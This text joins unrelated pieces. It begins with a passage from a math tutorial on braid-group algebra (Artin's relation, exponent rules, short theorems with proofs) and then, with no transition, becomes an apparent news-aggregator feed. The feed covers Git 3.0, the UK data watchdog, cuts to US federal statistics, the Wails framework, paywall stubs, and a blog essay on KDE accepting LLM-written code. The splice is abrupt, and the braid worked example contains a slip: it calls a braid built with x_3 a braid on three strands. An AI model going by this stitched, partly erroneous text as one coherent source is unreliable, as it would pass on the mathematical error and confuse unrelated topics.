With a little mental "tugging" on the strands below, one should easily be able to convince oneself that this relation holds for elementary braids $x_i$ and $x_{i+1}$ multiplied (i.e., concatenated) in the given way.

What is important, however, is that this special braid relation will allow us to manipulate braids now in a completely algebraic way -- never having to draw pictures like those above, if desired.

$\displaystyle{{\large \textrm{Artin's Relation}: x_i \, x_{i+1} \, x_i = x_{i+1} \, x_i \, x_{i+1}}}$

Putting It All Together

We have seen that braids on $n$ strands can be represented by algebraic expressions/words consisting of concatenations of elementary braids $x_1,x_2,x_3,\ldots,x_{n-1}$ and/or their inverses $x_1^{-1},x_2^{-1},x_3^{-1},\ldots,x_{n-1}^{-1}$.

These braid expressions are not unique to a given braid, however. We can certainly show two braid words represent the same braid by drawing pictures of each and "tugging" the strands this way and that until these pictures are identical. However, the equality of two braid words can also be shown by applying algebraic manipulations to one to produce the other, in accordance with the following rules:

Assuming $i$ and $j$ are taken from $1,2,\ldots,n-1$ as appropriate, $B_i$ represents an arbitrary braid word, and $I$ represents the identity braid of no crossings)

Braid Associativity $(B_1 B_2) B_3 = B_1 (B_2 B_3)$
Multiplication by the Identity $I \, B_i = B_i \, I = B_i$
Inverse Relations $x_i \, x_i^{-1} = I = x_i^{-1} \, x_i$
Commutativity of Distant Braids $x_i \, x_j = x_j \, x_i$ when $|i-j| \ge 2$
Artin's Relation $x_i \, x_{i+1} \, x_i = x_{i+1} \, x_i \, x_{i+1}$

Now let's put these to use! Consider the following way to simplify a braid $B$ on 3 strands where $$B = x_3^{-1} \, x_2 \, \, x_3 \, x_2 \, x_3^{-1}$$ Note that with only three strands, we won't be able to take advantage of the commutativity of distant braids. Further, we have no inverse pairs adjacent to one another, so we can't use any inverse relations yet.

However, there is an opportunity to apply Artin's relation. Notice, once we take advantage of this, we see two inverse pairs that can then be eliminated -- greatly simplifying the resulting expression!

$$\begin{array}{rcl} B & = & x_3^{-1} \, x_2 \, \, x_3 \, x_2 \, x_3^{-1}\\ & = & x_3^{-1} \, (x_2 \, \, x_3 \, x_2) \, x_3^{-1}\\ & = & x_3^{-1} \, (x_3 \, x_2 \, x_3) \, x_3^{-1}\\ & = & (x_3^{-1} \, x_3) \, x_2 \, (x_3 \, x_3^{-1})\\ & = & I \, x_2 \, I\\ & = & (I \, x_2) \, I\\ & = & x_2 \, I\\ & = & x_2 \end{array}$$

Expanding Braid Notation

Knowing that intermixed elementary inverse braids $b$ and $b^{-1}$ can result in cancellations leaving a product/concatenation of $x_i$ with itself some number of times (as demonstrated in the example below), we might find it useful and more compact to abbreviate a braid $b$ (elementary or otherwise) multiplied/concatenated by itself $p$ times by $b^p$. $$\begin{array}{rcl} b \, b \, b \, b^{-1} \, b \, b^{-1} \, b \, b & = & b \, b \, (b \, b^{-1}) \, (b \, b^{-1}) \, b \, b\\ & = & b \, b \, I \, I \, b \, b\\ & = & b \, b \, b \, b\\ & = & b^4 \end{array}$$

However, if the number of elementary braids of the form $b^{-1}$ exceed those of $b$ form, such products will simplify to a concatenation of $b^{-1}$ with itself some number of times (see example below). In these cases, abbreviating $(b^{-1})^p$ with $b^{-p}$ also seems natural and more compact.

$$\begin{array}{rcl} b \, b^{-1} \, b^{-1} \, b^{-1} \, b \, b^{-1} \, b \, b^{-1} & = & (b \, b^{-1}) \, b^{-1} \, (b^{-1} \, b) \, (b^{-1} \, b) \, b^{-1}\\ & = & I \, b^{-1} \, I \, I \, b^{-1}\\ & = & b^{-1} \, b^{-1}\\ & = & b^{-2} \end{array}$$

Of course, there is a third possibility. It could be that pairing off the $b$ and $b^{-1}$ elementary braids and eliminating them leaves nothing but $I$ in the end, as the following suggests: $$\begin{array}{rcl} b \, b^{-1} \, b^{-1} \, b^{-1} \, b \, b \, b^{-1} \, b & = & (b \, b^{-1}) \, b^{-1} \, (b^{-1} \, b) \, (b \, b^{-1}) \, b\\ & = & I \, b^{-1} \, I \, I \, b\\ & = & b^{-1} \, b\\ & = & I \end{array}$$

Given the above, Let us now make the following two additional definitions:

  • $b^0 = I$
  • $b^1 = b$

The reason for making the last two definitions above stems from the following observation: With these two definitions, we can safely say that the following simplification rules will now always hold, regardless of what integers $p$ and $q$ are involved! (Note that without these definitions, products like $x_i^3 x_i^{-3}$ or $x_i^3 x_i^{-2}$ can't be simplified with these rules.)

  • $b^p \, b^q = b^{p+q}$ (add exponents when multiplying powers)

  • $(b^p)^q = b^{pq}$ (multiply exponents when finding a power of a power)

Just for clarity, please know that the above examples and rules hold for any braid $b$, including elementary braids of the form $b = x_i$ or $b = x_i^{-1}$. As examples, it must be the case by the last two rules that $x_4^3 x_4^5 = x_4^8$ and $(x_2^7)^3 = x_2^{21}$

Noting that the first rule (the one about adding exponents) forces $b^p \, b^{-q} = b^{p-q}$ to also be true for any integers $p$ and $q$.

Taking things one step further, recall that the division of one real number by another is equivalent to multiplying the first by the reciprical (i.e., the multiplicative inverse) of the second. In a parallel way, we can define and denote the "division of one braid by another" (and the equivalent "fraction of braids") in the following way: $$b_1 \div b_2 = \frac{b_1}{b_2} = b_1 b_2^{-1}$$

Doing this leads to even more results for general braids which mirror the standard exponent rules with which the reader might already be familiar.

  • $\displaystyle{\frac{b^p}{b^q} = b^{p-q}}$ (subtract exponents when dividing powers)

  • $\displaystyle{b^{-p} = \frac{I}{b^p}}$ (negative exponents produce recipricals of powers) To see why, consider replacing $I$ with $b^0$.

  • $\displaystyle{\frac{I}{b_i b_j} = b_j^{-1} b_i^{-1}}$ (to invert a product, invert each and combine in reverse order) Consider $x_i x_j x_j^{-1} x_i^{-1}$.

We'll have more to say about the aforementioned standard exponent rules soon -- and why there is such a strong parallel between these and the rules we are developing for braids (and other things we will learn about shortly). For now however, let us push things even farther...

Note that we can say even more for commutative braids $b_i$ and $b_j$ or their inverses (e.g., "distant" elementary braids $x_i$ and $x_j$, where $|i-j| \ge 2$ or inverse pairs). In particular, for all integers $p$ the following simplification rules also must apply:

  • $(b_i b_j)^p = b_i^p b_j^p$ (exponents distribute over products of commutative elementary braids)

  • $\displaystyle{\left( \frac{b_i}{b_j} \right)^p = \frac{b_i^p}{b_j^p}}$ (exponents distribute over quotients of commutative elementary braids)

  • If $b_1$, $b_2$, $b_3$, and $b_4$ are all pairwise commutative, then

    $\displaystyle{\frac{b_1 b_2}{b_3 b_4} = \frac{b_1}{b_3} \cdot \frac{b_2}{b_4}}$ (quotients of products can be expressed as products of quotients)

To see how commutativity plays a role in these two rules, note that to establish the first (i.e., exponents distribute over products) we can use commutivity to get all the $x_i$ expressions together to consolidate them into a single power, as shown in the following example (look carefully between the 3rd and 4th expressions):: $$(b_i b_j)^2 = (b_i b_j)(b_i b_j) = b_i b_j b_i b_j = b_i b_i b_j b_j = b_i^2 b_j^2$$ Then, we can use the first rule to prove the second (i.e., where exponents are seen to distribute over quotients): $$\left(\frac{b_i}{b_j}\right)^2 = (b_i b_j^{-1})^2 = b_i^2 b_j^{-2} = \frac{b_i^2}{b_j^2}$$

As for the last rule, note how commutativity allows us to get from the third expression below to the fourth: $$\frac{b_1 b_2}{b_3 b_4} = b_1 b_2 (b_3 b_4)^{-1} = b_1 b_2 b_4^{-1} b_3^{-1} = b_1 b_3^{-1} b_2 b_4^{-1} = \frac{b_1}{b_3} \cdot \frac{b_2}{b_4}$$

Just be careful -- don't use any of these or other rules that rely on commutativity holding when it fails to hold!


Braid Theorems

While the results and definitions in the last section will let us prove certain pairs of braid expressions describe the same braid, sometimes doing so by direct application of these results and definitions can be quite long and tedius -- especially when we find ourselves applying the same sequence of manipulations over and over again. This of course is one reason why we prove theorems in mathematics -- to let us jump over all that repetition and make a useful (read that as "usable in many different contexts") conclusion from some given knowledge. We only need to prove the theorem in question holds.

As an example, for any given positive integer $i$, note how we can justify the following sequence of manipulations with what we know already: $$\begin{array}{rcll} x_i \, x_{i+1} \, x_i^{-1} & = & I \, x_i \, x_{i+1} \, x_i^{-1} & \scriptsize{\textrm{a property of the identity braid}}\\ & = & (x_{i+1}^{-1} \, x_{i+1}) \, x_i \, x_{i+1} \, x_i^{-1} & \scriptsize{\textrm{using inverse braids to form a "well-chosen value of "} I}\\ & = & x_{i+1}^{-1} \, (x_{i+1} \, x_i \, x_{i+1}) \, x_i^{-1} & \scriptsize{\textrm{associativity of braid concatenation}}\\ & = & x_{i+1}^{-1} \, (x_i \, x_{i+1} \, x_i) \, x_i^{-1} & \scriptsize{\textrm{Artin's Relation}}\\ & = & x_{i+1}^{-1} \, x_i \, x_{i+1} \, (x_i \, x_i^{-1}) & \scriptsize{\textrm{associativity of braid concatenation}}\\ & = & x_{i+1}^{-1} \, x_i \, x_{i+1} \, I & \scriptsize{\textrm{cancellation of inverse braids}}\\ & = & x_{i+1}^{-1} \, x_i \, x_{i+1} & \scriptsize{\textrm{a property of the identity braid}}\\ \end{array}$$

For lack of a better name, let us call this "Braid Theorem 1". That is to say,

Braid Theorem 1

For any positive integer $i$, the following will always be equivalent:     $x_i \, x_{i+1} \, x_i^{-1} = x_{i+1}^{-1} \, x_i \, x_{i+1}$

Having now proven this theorem, we can employ it in future manipulations. For example, suppose we were trying to decide if the following two braid words represent the same braid: $$x_2 \, x_3^{-1} \, x_2 \, x_2 \, x_3 \, x_2^{-1} \quad \stackrel{\text{?}}{=} \quad x_2 \, x_3^{-1} \, (x_3^{-1} \, x_3) \, x_2 \, x_3^{-1} \, x_2 \, x_3$$

With the theorem we just proved, we can prove they are equivalent in just 4 steps instead of the 10 steps it would require without it! $$\begin{array}{rcll} x_2 \, x_3^{-1} \, x_2 \, x_2 \, x_3 \, x_2^{-1} & = & x_2 \, x_3^{-1} \, x_2 \, (x_2 \, x_3 \, x_2^{-1}) & \scriptsize{\textrm{associativity of braid concatenation}}\\ & = & x_2 \, x_3^{-1} \, x_2 \, (x_3^{-1} \, x_2 \, x_3) & \scriptsize{\textrm{braid theorem 1}}\\ & = & x_2 \, x_3^{-1} \, I \, x_2 \, x_3^{-1} \, x_2 \, x_3 & \scriptsize{\textrm{a property of the identity braid}}\\ & = & x_2 \, x_3^{-1} \, (x_3^{-1} \, x_3) \, x_2 \, x_3^{-1} \, x_2 \, x_3 & \scriptsize{\textrm{using inverse braids to form a "well-chosen value of "} I}\\ \end{array}$$

Of course, proving some theorems can lead to wondering about others. For example, the expressions involved in the statement of Braid Theorem 1 are reminiscent of those in Artin's Relation -- except for the presence of an inverse elementary braid. What happens if the inverse elementary braid is in a different location -- say, on the first $x_i$ instead of the second? Because it would be "pretty" (due to the inherent symmetry involved), we might even hope that the following turns out to be true -- that for every positive integer $i$, we have $x_i^{-1} \, x_{i+1} \, x_i = x_{i+1} \, x_i \, x_{i+1}^{-1}$.

If this were true, we could remember both results as essentially an "Artin-like manipulation with a move of the inverse from one side to the other".

Of course, we don't know if this result holds yet -- we are only hopeful. We must prove it works for any positive integer $i$ before we can use it.

Let's try to argue similarly to how the last one was argued: $$\begin{array}{rcll} x_i^{-1} \, x_{i+1} \, x_i & = & x_i^{-1} \, x_{i+1} \, x_i \, I & \scriptsize{\textrm{a property of the identity braid}}\\ & = & x_i^{-1} \, x_{i+1} \, x_i \, (x_{i+1} \, x_{i+1}^{-1}) & \scriptsize{\textrm{using inverse braids to form a "well-chosen value of "} I}\\ & = & x_i^{-1} \, (x_{i+1} \, x_i \, x_{i+1}) \, x_{i+1}^{-1} & \scriptsize{\textrm{associativity of braid concatenation}}\\ & = & x_i^{-1} \, (x_i \, x_{i+1} \, x_i) \, x_{i+1}^{-1} & \scriptsize{\textrm{Artin's Relation}}\\ & = & (x_i^{-1} \, x_i) \, x_{i+1} \, x_i \, x_{i+1}^{-1} & \scriptsize{\textrm{associativity of braid concatenation}}\\ & = & I \, x_{i+1} \, x_i \, x_{i+1}^{-1} & \scriptsize{\textrm{cancellation of inverse braids}}\\ & = & x_{i+1} \, x_i \, x_{i+1}^{-1} & \scriptsize{\textrm{a property of the identity braid}}\\ \end{array}$$ Voila! We have shown that which we hoped to demonstrate -- we have proven our result!

By the way, in math textbooks one often sees the letters "QED." written at the end of a proof. This is merely an acronym for the Latin phrase "quod erat demonstrandum" which means "which was to be demonstrated".

Let us refer to this new theorem with an equally imaginative name -- say, "Braid Theorem 2":

Braid Theorem 2

For any positive integer $i$, the following will always be equivalent:     $x_i^{-1} \, x_{i+1} \, x_i = x_{i+1} \, x_i \, x_{i+1}^{-1}$

This is essentially how theorems in mathematics (involving braids or otherwise) get developed. First, somebody makes a good guess as to what they think should hold. Sometimes, this stems from some desire for the world to be "pretty" or symmetric. Other times, one makes some conjecture based on patterns they see hold in specific examples. Then, they try to form an argument that connects what they know to what they hope to show -- one that can be justified at every step and turn by things already accepted as true (e.g., definitions, postulates, other previously-proven theorems, etc).

One often tries to base these arguments on tricks or techniques that have worked in the past, much as we used the proof of Braid Theorem 1 as a guide to proving Braid Theorem 2. In this sense, mathematicians can build both on their own experience and on that of others. Interestingly however, the real fun for mathematicians begins when things they or others have used in the past fail to work! Working hard to find a new "wrinkle" on an old technique or creating a brand new way to argue something altogether -- that's where things get exciting!

Sadly, the presentation of theorems and their proofs in textbooks often leave out any discussion of the "blood, sweat, and tears" that went into a proof's initial construction. If you are lucky, they might briefly discuss the inspiration for the creative argument, but almost never explicitly address the author's excitement upon discovering that their novel approach bore fruit. Instead, the proof is often simply written as efficiently as possible -- often even omitting things deemed "easy enough" for the reader to fill in.

Part of this is to draw the reader's attention to the interesting (perhaps novel?) steps.


Sgt. Joe Friday
Another part of this is to not bias the reader to a particular line of conjecture and discovery, providing instead -- as a certain famed sergeant from the 1950's television show Dragnet would often say when questioning women as part of his police investigation:
" Just the facts, ma'am. " -- Sgt. Joe Friday

Perhaps the greatest motivation for this habit however, lies in the very thing that drove us to develop braid words and the above algebra they afford in the first place. In this, and in many, many more examples in the future, we will see that mathematicians seem to work very hard in everything they do to save themselves effort in the future. This includes being as brief and efficient as possible with anything they write.

As an example of this less verbose way of introducing a theorem and its proof, consider the following:

Braid Theorem 3

For any positive integer $i$, the following will always be equivalent:     $x_i x_{i+1}^{-1} x_i^{-1} = x_{i+1}^{-1} \, x_i^{-1} \, x_{i+1}$

Proof: $$\begin{array}{rcll} x_i \, x_{i+1}^{-1} \, x_i^{-1} & = & (x_{i+1}^{-1} \, x_{i+1}) \, x_i \, x_{i+1}^{-1} \, x_i^{-1} & \\ & = & x_{i+1}^{-1} \, (x_{i+1} \, x_i \, x_{i+1}^{-1}) \, x_i^{-1} & \\ & = & x_{i+1}^{-1} \, (x_i^{-1} \, x_{i+1} \, x_i) \, x_i^{-1} & \scriptsize{\textrm{ by braid theorem 2}}\\ & = & x_{i+1}^{-1} \, x_i^{-1} \, x_{i+1} \, (x_i \, x_i^{-1}) \\ & = & x_{i+1}^{-1} \, x_i^{-1} \, x_{i+1}\\ \end{array}$$

Notice in the above how the steps involving concatenation with $I$ were left out, much like one rarely writes a "multiplication by 1". Also, the more common applications of associativity or properties of inverses were left implicit, while the use of braid theorem 2 (i.e., the interesting step) was highlighted.

Just remember, when reading proofs presented in a "just the facts" style like the one above, it is your job as the reader to make sure you can justify each new step from the previous ones. To help you do this, you should always keep a pencil nearby when reading a math book!


Before continuing, you might try to conjecture and then prove results similar to braid theorems 1-3 that involve the following braids: $x_i^{-1} \, x_{i+1}^{-1} \, x_i$ and $x_i^{-1} \, x_{i+1}^{-1} \, x_i^{-1}$.

Git 3.0 will use main as the default branch

Hacker News
thoughtbot.com
2025-11-24 06:37:20
Comments...
Original Article

Starting with Git 3.0, developers will no longer have to configure the default branch for new repositories.

Git 2.52, released this week, includes this small but meaningful line in the patch notes :

Declare that “git init” that is not otherwise configured uses ‘main’ as the initial branch, not ‘master’, starting Git 3.0.

This change has been a long time coming. The Software Freedom Conservancy—the nonprofit home of the Git project—said in June 23, 2020 that Git would eventually update its default branch name. GitHub followed soon after, changing its default branch for new repositories to main on October 1, 2020.

Git 3.0 has no planned release date as of now, but current estimates put it near the end of 2026.

Other notable changes planned for 3.0 include:

  • Changing the default hash function from SHA-1 to SHA-256, improving security.
  • Changing the default storage format to better support macOS and Windows, and to improve performance.
  • More formally integrating Rust into Git’s own build process

About thoughtbot

We've been helping engineering teams deliver exceptional products for over 20 years. Our designers, developers, and product managers work closely with teams to solve your toughest software challenges through collaborative design and development. Learn more about us .

Civil liberties groups call for inquiry into UK data protection watchdog

Guardian
www.theguardian.com
2025-11-24 06:00:30
Campaigners including Good Law Project describe ICO ‘collapse in enforcement activity’ after Afghan data breach Dozens of civil liberties campaigners and legal professionals are calling for an inquiry into the UK’s data protection watchdog, after what they describe as “a collapse in enforcement act...
Original Article

Dozens of civil liberties campaigners and legal professionals are calling for an inquiry into the UK’s data protection watchdog, after what they describe as “a collapse in enforcement activity” after the scandal of the Afghan data breach .

A total of 73 academics, senior lawyers, data protection experts and organisations including Statewatch and the Good Law Project, have written a letter to Chi Onwurah, the chair of the cross-party Commons science, innovation and technology committee, coordinated by Open Rights Group, calling for an inquiry to be held into the office of the information commissioner, John Edwards.

“We are concerned about the collapse in enforcement activity by the Information Commissioner’s Office, which culminated in the decision to not formally investigate the Ministry of Defence (MoD) following the Afghan data breach,” the signatories state. They warn of “deeper structural failures” beyond that data breach.

The Afghan data breach was a particularly serious leak of information relating to individual Afghans who worked with British forces before the Taliban seized control of the country in August 2021. Those who discovered their names had been disclosed say it has put their lives at risk.

“Data breaches expose individuals to serious danger and are liable of disrupting government and business continuity,” the letter states. “However, in a recent public hearing hosted by your committee, Commissioner John Edwards has shown unwillingness to reconsider his approach to data protection enforcement, even in face of the most serious data breach that has ever occurred in the UK.”

The signatories cite other serious data breaches including those affecting victims of the Windrush scandal.

But they say the ICO has applied its “public sector approach” in these cases and either issued reprimands – written notices that lack the force of law – or significantly lowered the monetary penalties it awarded.

“The ICO decision not to pursue any formal action against the MoD despite their repeated failures was extraordinary, as was its failure to record its decision making. The picture that emerges is one where the ICO public sector approach lacks deterrence, and fails to drive the adoption of good data management across government and public bodies.”

“The handling of the Afghan data breach is not an isolated case; many are being let down by the ICO and its numerous failures to use corrective powers.”

The letter warns that alongside the shift away from enforcement in the public sector, statistics contained in the latest ICO report show that private sector enforcement is also becoming rarer as organisations are diverting resources away from compliance and responsible data practices, knowing that the ICO is not going to pursue the matter.

“Parliament has given the ICO considerable powers not to politely hope for the best, but to enforce compliance with legally binding orders. As we heard from the public hearing you hosted, the ICO chose not to use these powers to address the Afghan data breach.

“Unfortunately, the Afghan data breach is not an isolated incident, but the symptom of deeper structural failures which are emerging in the way the ICO operates.”

The letter concludes: “Change appears to be unlikely unless the Science, Innovation and Technology Committee uses their oversight powers and steps in.”

A spokesperson for the ICO said: “We have a range of regulatory powers and tools to choose from when responding to systemic issues in a given sector or industry.

“We respect the important role civil society plays in scrutinising our choices and will value the opportunity to discuss our approach during our next regular engagement. We also welcome our opportunities to account for our work when speaking to and appearing before the DSIT select committee.”

What OpenAI did when ChatGPT users lost touch with reality

Hacker News
www.nytimes.com
2025-11-24 05:58:08
Comments...
Original Article

Please enable JS and disable any ad blocker

Sunday Science: The Gravity Particle Should Exist. So Where Is It?

Portside
portside.org
2025-11-24 05:26:22
Sunday Science: The Gravity Particle Should Exist. So Where Is It? Ira Mon, 11/24/2025 - 00:26 ...
Original Article
Sunday Science: The Gravity Particle Should Exist. So Where Is It? Published


Matthew John O'Dowd is an Australian astrophysicist. He is an associate professor in the Physics and Astronomy Department at the Lehman College of the City University of New York and the writer and host of PBS Space Time.

Space Time explores the outer reaches of space, the craziness of astrophysics, the possibilities of sci-fi, and anything else you can think of beyond Planet Earth with our astrophysicist host: Matthew O’Dowd.

For all business inquiries and sponsorship opportunities please reach out to: pbsspacetime@lighthouseagents.com

Matt O'Dowd spends his time studying the universe, especially really far-away things like quasars, super-massive black holes, and evolving galaxies. He uses telescopes in space to do it. Matt completed his Ph.D. at NASA's Space Telescope Science Institute, followed by work at the University of Melbourne and Columbia University. He's now a professor at the City University of New York's Lehman College and an Associate at the American Museum of Natural History's Hayden Planetarium.

Previous host Gabe Perez-Giz is an astrophysicist who studies black hole physics. He received his Ph.D. from Columbia University and also hosted PBS Infinite Series.

Covid vaccines may increase the lifespan of cancer patients – this could be a game changer
Devi Sridhar
Guardian
A study suggesting mRNA vaccines help the body fight malignant cells raises the tantalising prospect of a low-cost, low-risk treatment that could help with all cancers
November 12, 2025

Lambda Calculus – Animated Beta Reduction of Lambda Diagrams

Hacker News
cruzgodar.com
2025-11-24 05:17:15
Comments...

Trump’s One Weird Trick for Eliminating Bad News: Delete It

Portside
portside.org
2025-11-24 04:44:20
Trump’s One Weird Trick for Eliminating Bad News: Delete It Ira Sun, 11/23/2025 - 23:44 ...
Original Article

HOW DO YOU ERADICATE hunger , STDs , illiteracy , poverty ?

It’s actually quite simple. You stop measuring them.

The government shutdown that just concluded left the country in something of a data blackout. Some major economic data releases have been delayed (like the September jobs report, which belatedly came out today ), and others canceled altogether (the October jobs report, which will never be released ). This has made it unusually difficult for U.S. businesses and the Federal Reserve to assess how well the economy is doing.

But if you assume the reopening of the government has put an end to these challenges, think again. The real threat to our understanding of the U.S. economy, and the country’s health writ large, is not that measly, six-week shutdown fight. It’s the fact that the Trump administration has been quietly snuffing out thousands of other data series, particularly those that might produce politically inconvenient results.

Take for example President Donald Trump’s boasts about bringing more international investment into the United States. 1 He extracted pledges from Switzerland and South Korea . Just this week, he boasted of a whopping $1 trillion in blood money from Saudi Arabian Crown Prince Mohammed bin Salman (as my colleague Andrew Egger notes , the Saudi investment jumped from $600 billion to $1 trillion in the course of a few minutes and would, if real, amount to an absurd chunk of the country’s GDP).

But fulfillment of such pledges is notoriously fickle; in the past, plenty of foreign companies and governments have promised big investments in U.S. factories and jobs that never materialized , generating bad headlines for the politicians who wrangled them. Fortunately for Trump, these pledges will become increasingly un-fact-checkable.

That’s because yesterday, to relatively little fanfare, the U.S. Bureau of Economic Analysis announced it was discontinuing some of its data collection on foreign investment in the United States as part of its “ongoing streamlining initiatives.” This follows previous announcements from the BEA in recent months about how it was paring back other data collection on foreign direct investment due to “ resource constraints .”

In the absence of data, I guess we’ll simply have to trust Trump when he says that he’s delivered.

Now, do I think Trump directed the BEA to eliminate these measures specifically to make it easier for him to bullshit about his dealmaking prowess? Not exactly. While there are some cases where the administration has leaned on statistical agencies or explicitly censored their findings , the more common and less visible tactic has been to just defund them .

Trump’s fiscal year 2026 budget request for the Bureau of Economic Analysis reflects a 20 percent reduction compared to last year, a target that agency staff have told me they’ve already hit thanks to DOGE cuts, early retirements, and hiring freezes. (The comms team at BEA—like most statistical agency press offices I’ve contacted in recent months—has declined to confirm or deny these numbers.) This has forced the BEA to make tough choices. The agency also is responsible for producing much higher-profile, market-moving data, such as the reports on GDP, consumer spending, and the Federal Reserve’s preferred measure of inflation. Something had to give, and this week, that something was data on foreign investment.

Other major statistical agencies are struggling with their own brain drains and funding cuts.

Take the Bureau of Labor Statistics, which releases data on the job market and prices, among other marquee measures. In August, Trump’s decision to fire Erika McEntarfer, the BLS commissioner, grabbed headlines, 2 but the top job is hardly the only hole this administration has blown in that agency. At the time of McEntarfer’s firing, a third of senior BLS leadership positions were already vacant . (That’s still the case , in fact.)

The rest of the agency has been swiss-cheesed too. Some regional field offices—such as the consumer price index offices in Buffalo, New York; Lincoln, Nebraska; and Provo, Utah—have been shuttered entirely . Meanwhile, post-COVID, the agency was already struggling with reduced survey-response rates, which have made its numbers noisier and more susceptible to big revisions. The administration’s response has been to disband the task force working to fix these problems.

The result is that federal data are being degraded—or deleted altogether. And deletion is especially common when statistical series measure issues that this administration would rather not track.

In September, for instance, the administration canceled a three-decade-old annual survey that measures how many Americans struggle to get enough food . A few months earlier, HHS eliminated the team that produces the poverty guidelines , which determine how we count the number of people in poverty and eligibility for benefits such as SNAP, Medicaid, Head Start, and childcare subsidies. But hey, if you never determine who’s eligible for benefits, maybe that means no one is.

Over the past ten months, I’ve been tracking similar cuts to federal data collection on substance abuse , natural disasters , children’s literacy , climate change , race , crime , immigration , gender identity and other issues. (My non-exhaustive, running list lives here ; please send me examples I may have missed.)

Lots of people might take these numbers for granted, but we’ll notice when they’re gone. We need these data to interpret the world around us and make decisions . Consumers use them to track the weather, determine where to send their kids to school, and negotiate raises. Businesses use them to hire, invest, price, and purchase. Doctors use them to diagnose illnesses. Public officials use them to craft policy. 3 And voters use them to determine whether their elected officials are keeping their promises.

But instead of recognizing the usefulness of these data—or perhaps because he recognizes it—the president has chosen to curate his own reality .

As was the case last week, when the White House cheerily announced that inflation had fallen because DoorDash’s breakfast offerings had gotten cheaper, and because Walmart had shrinkflationed its Thanksgiving dinner deal . Maybe this seemed forgivable when government agencies were shut down and everyone was looking for alternative measures to fill the statistical void. My fear is that the voids are multiplying.

1 Boosting foreign direct investment in the United States is a somewhat bizarre thing for Trump to fixate on, since higher FDI mathematically increases our trade deficits . Which Trump believes are already catastrophically high. But whatever, not like Trump has a Wharton degree.

3 “I would not want anyone to think the data have deteriorated to a point where it’s difficult for us to understand the economy,” Federal Reserve Chair Jerome Powell said in a June Senate hearing . “But the direction of travel is concerning.”


Catherine Rampell is economics editor at The Bulwark and an anchor at MS NOW (fmrly MSNBC). She specializes in econ, politics, public policy, immigration. Previously at WaPo, NYT, CNN, PBS NewsHour.

The Bulwark was founded to provide analysis and reporting in defense of America’s liberal democracy.

We publish written articles and newsletters. We create podcasts and YouTube videos. We give political analysis from experts who have spent their lives in the business.

Some of what we do is behind a paywall. Most of what we do is not. That’s because we are a mission-based organization first and a business second.

And you can’t help save democracy from behind a paywall.

The Bulwark is a reader-supported publication. Sign-up to receive newsletters and support our work.

Build desktop applications using Go and Web Technologies

Hacker News
github.com
2025-11-24 04:33:57
Comments...
Original Article


Table of Contents

Introduction

The traditional method of providing web interfaces to Go programs is via a built-in web server. Wails offers a different approach: it provides the ability to wrap both Go code and a web frontend into a single binary. Tools are provided to make this easy for you by handling project creation, compilation and bundling. All you have to do is get creative!

Features

  • Use standard Go for the backend
  • Use any frontend technology you are already familiar with to build your UI
  • Quickly create rich frontends for your Go programs using pre-built templates
  • Easily call Go methods from Javascript
  • Auto-generated Typescript definitions for your Go structs and methods
  • Native Dialogs & Menus
  • Native Dark / Light mode support
  • Supports modern translucency and "frosted window" effects
  • Unified eventing system between Go and Javascript
  • Powerful cli tool to quickly generate and build your projects
  • Multiplatform
  • Uses native rendering engines - no embedded browser !

Roadmap

The project roadmap may be found here . Please consult it before creating an enhancement request.

Getting Started

The installation instructions are on the official website .

Sponsors

This project is supported by these kind people / companies:

FAQ

  • Is this an alternative to Electron?

    Depends on your requirements. It's designed to make it easy for Go programmers to make lightweight desktop applications or add a frontend to their existing applications. Wails does offer native elements such as menus and dialogs, so it could be considered a lightweight electron alternative.

  • Who is this project aimed at?

    Go programmers who want to bundle an HTML/JS/CSS frontend with their applications, without resorting to creating a server and opening a browser to view it.

  • What's with the name?

    When I saw WebView, I thought "What I really want is tooling around building a WebView app, a bit like Rails is to Ruby". So initially it was a play on words (Webview on Rails). It just so happened to also be a homophone of the English name for the Country I am from. So it stuck.

Stargazers over time

Star History Chart

Contributors

The contributors list is getting too big for the readme! All the amazing people who have contributed to this project have their own page here .

License

FOSSA Status

Inspiration

This project was mainly coded to the following albums:

Insurers retreat from AI cover as risk of multibillion-dollar claims mounts

Hacker News
www.ft.com
2025-11-24 04:22:12
Comments...
Original Article

Subscribe to unlock this article

Try unlimited access

Only $1 for 4 weeks

Then $75 per month. Complete digital access to quality FT journalism on any device. Cancel anytime during your trial.

Explore our full range of subscriptions.

For individuals

Discover all the plans currently available in your country

For multiple readers

Digital access for organisations. Includes exclusive features and content.

Why the FT?

See why over a million readers pay to read the Financial Times.

Find out why

With Love to KDE: Take a Moment

Lobsters
korcenji.neocities.org
2025-11-24 04:10:33
Comments...
Original Article

I've been using KDE Plasma for four and a half years. The community is sweet and the software is stellar, and I see a bright future for it. I want it to be the best it can be! So, I'd like to talk about a small incident that I want KDE to lean away from.

TL;DR: Please look at adopting an "AI" Policy similar to Servo's . Other projects' policies, like Asahi Linux's (they love KDE!) and Bevy's, may also be worth a look. Even Forgejo has its "AI" Agreement, though in my opinion it's a bit watered down.

Grzesiek11 writes: Do you seriously accept AI-generated code into KDE software? That’s concerning. Let’s even ignore ethical debates and code quality questions, models used for this are trained on a lot of proprietary code. We do not know whether this constitutes a derivative work. Proprietary projects like Windows obviously do not care about copyright (unless it’s theirs), but libre projects should hold themselves to a higher standard in my opinion, as we really do rely on the code being owned by the people who write patches. Nate Graham responds: There’s an interesting parallel with KDE’s “real name” policy. In the past we were very firm about requiring one for contributions. But… how do we know the name someone picks is a real one? If it’s obviously fake like “uwu I’m a Kawaii Dragon” or “Max Mustermann”, then sure, we’ll know. But otherwise, it’s impossible. At a certain point we realized we were penalizing people for being honest about desiring anonymity and started accepting patches no matter the name. It’s a similar situation with AI, I think. There’s no way of knowing unless the use is obvious and not hidden — and at that point rejecting it would be be penalizing people for honesty.
A light exchange; or, the incident .

Before Nate made his response, I was also thinking about their old Real Name Policy. I thought it was kinda funny that KDE rejected psuedonyms for years for provenance reasons — and then felt they should accept LLM contributions even though a scraping LLM cannot ever have provenance.

Nate's reply then emulsifies these two positions. It seems his takeaway was not that pseudonyms have a negligible impact on provenance, but instead that provenance is impossible and so KDE should give up.

I find this odd? The logic doesn't sit well with me.

He's turned We can't know that someone's using a real name, so we must openly accept fake names.
Into We can't know that someone's not using an LLM, so we must openly accept LLM contributions.

But these statements don't evaluate the worth of pseudonyms or LLM code, and are instead purely defensive — "How practical is it to guarantee we avoid X ?" (Which for almost any given X , the answer is "We can't guarantee much at all". People can lie on the internet!)

My 2¢ is that there are other reasons to consider not accepting something. For instance, it would be bad to say,
We can't know that someone's not a nazi, so we must openly accept nazi contributions.

